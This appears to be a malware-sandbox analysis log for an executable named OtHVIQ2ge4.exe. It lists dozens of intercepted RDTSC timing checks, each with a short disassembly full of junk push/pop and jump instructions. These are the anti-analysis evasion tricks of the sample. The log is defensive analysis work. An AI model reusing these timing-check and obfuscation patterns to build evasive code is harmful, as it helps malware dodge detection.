Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7B8C42 second address: 7B8C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7BD160 second address: 7BD16C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jp 00007FF628B69586h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7C1743 second address: 7C1750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FF628D73F56h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7C1750 second address: 7C1767 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jns 00007FF628B69586h 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7C18AF second address: 7C18B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7C1DEB second address: 7C1DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7C2514 second address: 7C2539 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF628D73F58h 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FF628D73F5Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7C2539 second address: 7C253E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7C253E second address: 7C2557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF628D73F64h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7C8BEE second address: 7C8BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7CBE95 second address: 7CBEAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF628D73F64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7CBEAD second address: 7CBEB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7CBEB1 second address: 7CBEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7386D9 second address: 7386DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7386DD second address: 7386F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF628D73F5Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7386F1 second address: 73870E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF628B69597h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D2B3C second address: 7D2B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D2B42 second address: 7D2B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D1575 second address: 7D1588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FF628D73F56h 0x00000009 jnc 00007FF628D73F56h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D16FD second address: 7D1702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D1702 second address: 7D1707 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D1B16 second address: 7D1B2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FF628B69586h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D1B2A second address: 7D1B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF628D73F56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D1B36 second address: 7D1B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF628B69598h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D1CF5 second address: 7D1D01 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF628D73F56h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D1D01 second address: 7D1D19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628B6958Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FF628B69586h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D282F second address: 7D2835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D2835 second address: 7D283B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D283B second address: 7D2840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D2840 second address: 7D2847 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D60AD second address: 7D60B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D60B3 second address: 7D60B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D60B7 second address: 7D60D4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF628D73F56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF628D73F5Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D60D4 second address: 7D60DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D60DA second address: 7D610C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007FF628D73F56h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FF628D73F63h 0x00000014 jne 00007FF628D73F56h 0x0000001a popad 0x0000001b push ebx 0x0000001c jnp 00007FF628D73F56h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D623E second address: 7D6244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D6534 second address: 7D653F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 747907 second address: 747911 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF628B69586h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D9D82 second address: 7D9D9A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF628D73F5Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D9D9A second address: 7D9DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7D9DA0 second address: 7D9DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jc 00007FF628D73F5Ch 0x0000000d jng 00007FF628D73F56h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7DA026 second address: 7DA033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FF628B69586h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7DFDA1 second address: 7DFDA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7DFDA7 second address: 7DFDD8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FF628B69595h 0x0000001a jl 00007FF628B69586h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E07D3 second address: 7E07F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 jmp 00007FF628D73F69h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E0A8C second address: 7E0AAA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF628B69591h 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E0AAA second address: 7E0AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E0D86 second address: 7E0D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E1051 second address: 7E106D instructions: 0x00000000 rdtsc 0x00000002 je 00007FF628D73F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF628D73F5Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E106D second address: 7E107D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FF628B69586h 0x0000000a jng 00007FF628B69586h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E1325 second address: 7E1341 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF628D73F62h 0x00000008 jg 00007FF628D73F56h 0x0000000e jnp 00007FF628D73F56h 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007FF628D73F56h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E1341 second address: 7E1355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FF628B69588h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E1355 second address: 7E1378 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF628D73F5Eh 0x0000000a js 00007FF628D73F56h 0x00000010 jnp 00007FF628D73F56h 0x00000016 popad 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E15DB second address: 7E15E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E15E1 second address: 7E15E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E15E5 second address: 7E15FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jns 00007FF628B69586h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E15FB second address: 7E15FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E681D second address: 7E6860 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007FF628B69586h 0x00000009 pop esi 0x0000000a push esi 0x0000000b jmp 00007FF628B69598h 0x00000010 je 00007FF628B69586h 0x00000016 pop esi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jo 00007FF628B69595h 0x00000021 push esi 0x00000022 pop esi 0x00000023 jmp 00007FF628B6958Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E6860 second address: 7E687B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF628D73F67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E687B second address: 7E687F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E5A58 second address: 7E5A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E5A5C second address: 7E5A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E5A60 second address: 7E5A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E5A66 second address: 7E5ABD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF628B69599h 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b js 00007FF628B69586h 0x00000011 jmp 00007FF628B69596h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF628B69590h 0x00000022 jne 00007FF628B69586h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E5ABD second address: 7E5AC7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF628D73F56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E5AC7 second address: 7E5ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E5ACD second address: 7E5AD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E6297 second address: 7E629D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E629D second address: 7E62C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF628D73F68h 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007FF628D73F56h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E63F7 second address: 7E6410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF628B69595h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E6410 second address: 7E6414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E6414 second address: 7E6426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FF628B69586h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E6426 second address: 7E642A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E642A second address: 7E642E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7E6589 second address: 7E658D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 74282A second address: 74283F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF628B69590h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F1FA2 second address: 7F1FBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF628D73F65h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F212B second address: 7F2136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F2136 second address: 7F2164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FF628D73F5Fh 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007FF628D73F58h 0x0000001f push edx 0x00000020 pop edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F2164 second address: 7F2170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF628B69586h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F2170 second address: 7F2175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F2580 second address: 7F2585 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F2585 second address: 7F25B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF628D73F56h 0x0000000a jmp 00007FF628D73F63h 0x0000000f jnc 00007FF628D73F56h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007FF628D73F56h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F25B1 second address: 7F25DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF628B69586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF628B69599h 0x00000014 jnl 00007FF628B69586h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F25DF second address: 7F25E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F28A8 second address: 7F28B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FF628B6958Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F28B6 second address: 7F28C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF628D73F90h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F28C4 second address: 7F28CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F2A73 second address: 7F2A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F2A79 second address: 7F2A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 js 00007FF628B69586h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jne 00007FF628B6958Eh 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	RDTSC instruction interceptor: First address: 7F2C06 second address: 7F2C20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF628D73F61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
